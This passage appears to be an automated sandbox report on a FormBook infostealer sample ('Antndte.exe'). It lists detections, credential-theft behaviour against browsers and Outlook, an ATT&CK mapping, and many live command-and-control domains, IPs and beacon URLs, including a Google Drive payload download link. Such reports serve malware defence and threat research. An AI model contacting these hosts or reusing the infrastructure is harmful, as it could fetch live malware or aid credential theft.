        Source: Yara matchFile source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
        Valid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		11
        Masquerading        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		Exfiltration Over Other Network Medium11
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
        System Shutdown/Reboot        		Acquire InfrastructureGather Victim Identity Information
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts411
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		Exfiltration Over Bluetooth3
        Ingress Tool Transfer        		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
        Domain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		1
        Access Token Manipulation        		Security Account Manager1
        Application Window Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		Automated Exfiltration4
        Non-Application Layer Protocol        		Data Encrypted for ImpactDNS ServerEmail Addresses
        Local AccountsCronLogin HookLogin Hook411
        Process Injection        		NTDS2
        File and Directory Discovery        		Distributed Component Object Model1
        Clipboard Data        		Traffic Duplication5
        Application Layer Protocol        		Data DestructionVirtual Private ServerEmployee Names
        Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets4
        System Information Discovery        		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
        Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Obfuscated Files or Information        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
        External Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Rundll32        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
        Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1353242 Sample: Antndte.exe Startdate: 04/12/2023 Architecture: WINDOWS Score: 100 31 www.echolinkevolve.xyz 2->31 33 www.vaultedjewelry.com 2->33 35 29 other IPs or domains 2->35 47 Snort IDS alert for network traffic 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 55 3 other signatures 2->55 10 Antndte.exe 16 52 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 31->53 process4 file5 27 C:\Users\user\AppData\Local\...\System.dll, PE32 10->27 dropped 29 C:\Users\user\AppData\Local\...\LangDLL.dll, PE32 10->29 dropped 13 Antndte.exe 6 10->13         started        process6 dnsIp7 43 drive.google.com 142.250.80.46, 443, 50129 GOOGLEUS United States 13->43 45 googlehosted.l.googleusercontent.com 142.251.41.1, 443, 50130 GOOGLEUS United States 13->45 65 Maps a DLL or memory area into another process 13->65 17 czazZqNSMxullu.exe 13->17 injected signatures8 process9 process10 19 rundll32.exe 13 17->19         started        signatures11 57 Tries to steal Mail credentials (via file / registry access) 19->57 59 Tries to harvest and steal browser information (history, passwords, etc) 19->59 61 Writes to foreign memory regions 19->61 63 3 other signatures 19->63 22 czazZqNSMxullu.exe 19->22 injected 25 firefox.exe 19->25         started        process12 dnsIp13 37 metodomestredojogo.com 108.179.192.34, 50144, 50145, 50146 UNIFIEDLAYER-AS-1US United States 22->37 39 www.ritualyoga.org 216.40.34.41, 50136, 50137, 50138 TUCOWSCA Canada 22->39 41 15 other IPs or domains 22->41

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Antndte.exe16%ReversingLabsWin32.Trojan.InjectorX

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsm118D.tmp\LangDLL.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.vaultedjewelry.com/3hr5/?TZd=EijkiYqzwZN1BhBpIykWY0SibsexD2BbsSiB3fZdeNuUj8Ukz47SSRBmN8cMCE5z6SXuPEOXWwW1mi1FwYWeXvEwrZlQEKUUXQ==&1dr=yP5PQD38100%Avira URL Cloudmalware
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.ritualyoga.org/3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD380%Avira URL Cloudsafe
        http://www.ritualyoga.org/3hr5/0%Avira URL Cloudsafe
        http://www.neuvillette.org/3hr5/?TZd=q1X/IYN8eKewuN13aiQWFCouSmM7D+QNK5N6gfBg5YPvN3u/YjmPX9Swyhyhl1JXW1KA5roj8jCGf76SGeGao+TTCbXI7mNU4g==&1dr=yP5PQD38100%Avira URL Cloudmalware
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.rocsys.net/3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD380%Avira URL Cloudsafe
        http://www.slimnthinau.com/3hr5/0%Avira URL Cloudsafe
        http://www.hormigonesmil.com/3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD380%Avira URL Cloudsafe
        http://www.rocsys.net/3hr5/0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://www.homesteadmath.com/3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD380%Avira URL Cloudsafe
        http://www.scoopstarz.com/3hr5/0%Avira URL Cloudsafe
        http://www.austintrafficlawyer.com/3hr5/0%Avira URL Cloudsafe
        http://www.eigenheimstattmiete.com/3hr5/0%Avira URL Cloudsafe
        http://www.metodomestredojogo.com/3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD380%Avira URL Cloudsafe
        http://www.engindenizyurdu.com/3hr5/?TZd=cybVuDtLHKDYoAC8BtRtsfHHNdqM0/3VmZgYz4alBfxy2AFWbwCj5N7XVIo5x4xVvDhkEXfU/TSdDvvPnMbZ8BO8VTwNCq9LYQ==&gpo=NNNtyBQpfR9tJN10%Avira URL Cloudsafe
        http://www.littlehappiez.com/3hr5/100%Avira URL Cloudmalware
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.rtptornado4dnihboss.com/3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD380%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        http://www.echolinkevolve.xyz/3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38100%Avira URL Cloudmalware
        http://www.homesteadmath.com/3hr5/0%Avira URL Cloudsafe
        http://www.brls.money/3hr5/100%Avira URL Cloudmalware
        http://www.littlehappiez.com/3hr5/?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1100%Avira URL Cloudmalware
        http://www.metodomestredojogo.com/3hr5/0%Avira URL Cloudsafe
        http://www.080869.com/3hr5/?TZd=SKyXXko5z7q9YQjFZFQloZKIT7V5SVEae/5q6Ytdmten2hC5b6JJ08XTyYu5k0EUJUGdyr8TcNcxF84C+h+0NQx0rsHsMlG9kw==&1dr=yP5PQD380%Avira URL Cloudsafe
        http://www.echolinkevolve.xyz/3hr5/100%Avira URL Cloudmalware
        http://www.rtptornado4dnihboss.com/3hr5/0%Avira URL Cloudsafe
        http://www.austintrafficlawyer.com/3hr5/?TZd=c86HwL6awPzuMGf5odR8ge26ZJuW2ve/yLw5siKGJriA7+WnzKeTjM+vElG16hohQNIzfICPIQpWrOzE9UWowUmJc+Cd2Q+HJw==&gpo=NNNtyBQpfR9tJN10%Avira URL Cloudsafe
        http://www.brls.money/3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38100%Avira URL Cloudmalware
        http://www.opleverdossier.online/3hr5/0%Avira URL Cloudsafe
        http://www.fisiocomoterapia.com/3hr5/?TZd=W8hj+ZAnfVNXO/00LhML7TvkVgnbLHvZg2EZ4Jo9WuG5xJWbZ5L5hN7sKdMlw1DL3P6Y0UBuLzf410vX+kFx4V+xT/ik7P0KhQ==&gpo=NNNtyBQpfR9tJN10%Avira URL Cloudsafe
        http://www.080869.com/3hr5/0%Avira URL Cloudsafe
        http://www.opleverdossier.online/3hr5/?TZd=Ev/i97Tm7R4lDQvwRTbCpMnzZ5SeBkReZZSk+dIP2ayGgCnfpc6J5LuxSZ4Sg1Tim62dxJKo6oeqNUab7HWhjplzx5YkH5PNCw==&gpo=NNNtyBQpfR9tJN10%Avira URL Cloudsafe
        http://www.engindenizyurdu.com/3hr5/0%Avira URL Cloudsafe
        http://www.slimnthinau.com/3hr5/?TZd=ksyUunDrVEa0KTu9vPYxs761+eAaxKot9rPDN6rYUiwEC3plPpQTFjv1rO9K0/xZs75gUsnXDeEoWRSVvif2xqzz7ty8+MasXQ==&1dr=yP5PQD380%Avira URL Cloudsafe
        http://www.neuvillette.org/3hr5/100%Avira URL Cloudmalware
        http://www.vaultedjewelry.com/3hr5/100%Avira URL Cloudmalware
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://www.eigenheimstattmiete.com/3hr5/?TZd=mIVLDg45zmTFrESw9faeiDzJXXUQkT31xJX0RHf3EtohXuktSLitc4YcqcRWfkqc8sDZtVKgsH1VZ8DqKxZju6hVCIK2DTgKDw==&1dr=yP5PQD380%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.eigenheimstattmiete.com
        		89.31.143.90
        		truetrue
          		unknown
          www.brls.money
          		76.76.21.142
          		truetrue
            		unknown
            www.080869.com
            		104.232.106.165
            		truetrue
              		unknown
              www.austintrafficlawyer.com
              		217.160.0.27
              		truetrue
                		unknown
                parkingpage.namecheap.com
                		91.195.240.19
                		truefalse
                  		high
                  www.hormigonesmil.com
                  		54.36.145.173
                  		truefalse
                    		unknown
                    www.scoopstarz.com
                    		172.67.202.151
                    		truetrue
                      		unknown
                      www.ritualyoga.org
                      		216.40.34.41
                      		truetrue
                        		unknown
                        shops.myshopify.com
                        		23.227.38.74
                        		truetrue
                          		unknown
                          rocsys.net
                          		37.97.254.27
                          		truetrue
                            		unknown
                            metodomestredojogo.com
                            		108.179.192.34
                            		truetrue
                              		unknown
                              opleverdossier.online
                              		91.184.0.200
                              		truetrue
                                		unknown
                                fisiocomoterapia.com
                                		89.117.169.140
                                		truetrue
                                  		unknown
                                  drive.google.com
                                  		142.250.80.46
                                  		truefalse
                                    		high
                                    www.echolinkevolve.xyz
                                    		198.177.123.106
                                    		truetrue
                                      		unknown
                                      www.slimnthinau.com
                                      		91.195.240.117
                                      		truetrue
                                        		unknown
                                        www.homesteadmath.com
                                        		74.208.236.243
                                        		truetrue
                                          		unknown
                                          googlehosted.l.googleusercontent.com
                                          		142.251.41.1
                                          		truefalse
                                            		high
                                            rtptornado4dnihboss.com
                                            		198.252.98.64
                                            		truetrue
                                              		unknown
                                              www.vaultedjewelry.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.littlehappiez.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.opleverdossier.online
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.fisiocomoterapia.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.rtptornado4dnihboss.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.engindenizyurdu.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.metodomestredojogo.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.extragrandifirme.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.neuvillette.org
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                doc-0c-0k-docs.googleusercontent.com
                                                                		unknown
                                                                		unknownfalse
                                                                  		high
                                                                  www.buben.consulting
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    www.rocsys.net
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown

                                                                      Contacted URLs

                                                                      NameMaliciousAntivirus DetectionReputation
                                                                      http://www.rocsys.net/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.rocsys.net/3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.neuvillette.org/3hr5/?TZd=q1X/IYN8eKewuN13aiQWFCouSmM7D+QNK5N6gfBg5YPvN3u/YjmPX9Swyhyhl1JXW1KA5roj8jCGf76SGeGao+TTCbXI7mNU4g==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.ritualyoga.org/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.ritualyoga.org/3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.slimnthinau.com/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.hormigonesmil.com/3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38false
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.vaultedjewelry.com/3hr5/?TZd=EijkiYqzwZN1BhBpIykWY0SibsexD2BbsSiB3fZdeNuUj8Ukz47SSRBmN8cMCE5z6SXuPEOXWwW1mi1FwYWeXvEwrZlQEKUUXQ==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.eigenheimstattmiete.com/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.homesteadmath.com/3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.scoopstarz.com/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.engindenizyurdu.com/3hr5/?TZd=cybVuDtLHKDYoAC8BtRtsfHHNdqM0/3VmZgYz4alBfxy2AFWbwCj5N7XVIo5x4xVvDhkEXfU/TSdDvvPnMbZ8BO8VTwNCq9LYQ==&gpo=NNNtyBQpfR9tJN1true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.metodomestredojogo.com/3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.rtptornado4dnihboss.com/3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.austintrafficlawyer.com/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.littlehappiez.com/3hr5/true
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.echolinkevolve.xyz/3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.homesteadmath.com/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.rtptornado4dnihboss.com/3hr5/true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.austintrafficlawyer.com/3hr5/?TZd=c86HwL6awPzuMGf5odR8ge26ZJuW2ve/yLw5siKGJriA7+WnzKeTjM+vElG16hohQNIzfICPIQpWrOzE9UWowUmJc+Cd2Q+HJw==&gpo=NNNtyBQpfR9tJN1true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.littlehappiez.com/3hr5/?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1true
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.echolinkevolve.xyz/3hr5/true
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.brls.money/3hr5/true
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.080869.com/3hr5/?TZd=SKyXXko5z7q9YQjFZFQloZKIT7V5SVEae/5q6Ytdmten2hC5b6JJ08XTyYu5k0EUJUGdyr8TcNcxF84C+h+0NQx0rsHsMlG9kw==&1dr=yP5PQD38true
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://doc-0c-0k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/067j0cfqh00llp67j6c8t9vjf51stn5l/1701699675000/13539573903470379141/*/1YEiS4USubspx63PCPnPvhVVNsu4h-RY3?e=download&uuid=93397b9d-12f9-4f2d-8d03-b765824cb4a8false
                                                                        		high
                                                                        http://www.metodomestredojogo.com/3hr5/true
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.brls.money/3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38true
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://www.080869.com/3hr5/true
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.fisiocomoterapia.com/3hr5/?TZd=W8hj+ZAnfVNXO/00LhML7TvkVgnbLHvZg2EZ4Jo9WuG5xJWbZ5L5hN7sKdMlw1DL3P6Y0UBuLzf410vX+kFx4V+xT/ik7P0KhQ==&gpo=NNNtyBQpfR9tJN1true
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.opleverdossier.online/3hr5/true
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.engindenizyurdu.com/3hr5/true
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.opleverdossier.online/3hr5/?TZd=Ev/i97Tm7R4lDQvwRTbCpMnzZ5SeBkReZZSk+dIP2ayGgCnfpc6J5LuxSZ4Sg1Tim62dxJKo6oeqNUab7HWhjplzx5YkH5PNCw==&gpo=NNNtyBQpfR9tJN1true
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.slimnthinau.com/3hr5/?TZd=ksyUunDrVEa0KTu9vPYxs761+eAaxKot9rPDN6rYUiwEC3plPpQTFjv1rO9K0/xZs75gUsnXDeEoWRSVvif2xqzz7ty8+MasXQ==&1dr=yP5PQD38true
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.neuvillette.org/3hr5/true
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://www.vaultedjewelry.com/3hr5/true
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://www.eigenheimstattmiete.com/3hr5/?TZd=mIVLDg45zmTFrESw9faeiDzJXXUQkT31xJX0RHf3EtohXuktSLitc4YcqcRWfkqc8sDZtVKgsH1VZ8DqKxZju6hVCIK2DTgKDw==&1dr=yP5PQD38true
                                                                        • Avira URL Cloud: safe
                                                                        		unknown

                                                                        URLs from Memory and Binaries

                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDAntndte.exe, 00000002.00000001.9887364780.0000000000626000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                          		high
                                                                          http://www.gopher.ftp://ftp.Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.google.comAntndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdAntndte.exe, 00000002.00000001.9887364780.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://doc-0c-0k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/067j0cfqAntndte.exe, 00000002.00000002.10097194599.00000000053B6000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.000000000540F000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985973812.000000000540E000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004462210.000000000540E000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004311607.00000000053B6000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://apis.google.comAntndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ocsp.quovadisoffshore.com0Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10053726919.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://nsis.sf.net/NSIS_ErrorErrorAntndte.exe, 00000000.00000000.9659783215.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Antndte.exe, 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Antndte.exe, 00000002.00000000.9886080222.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                                  		high
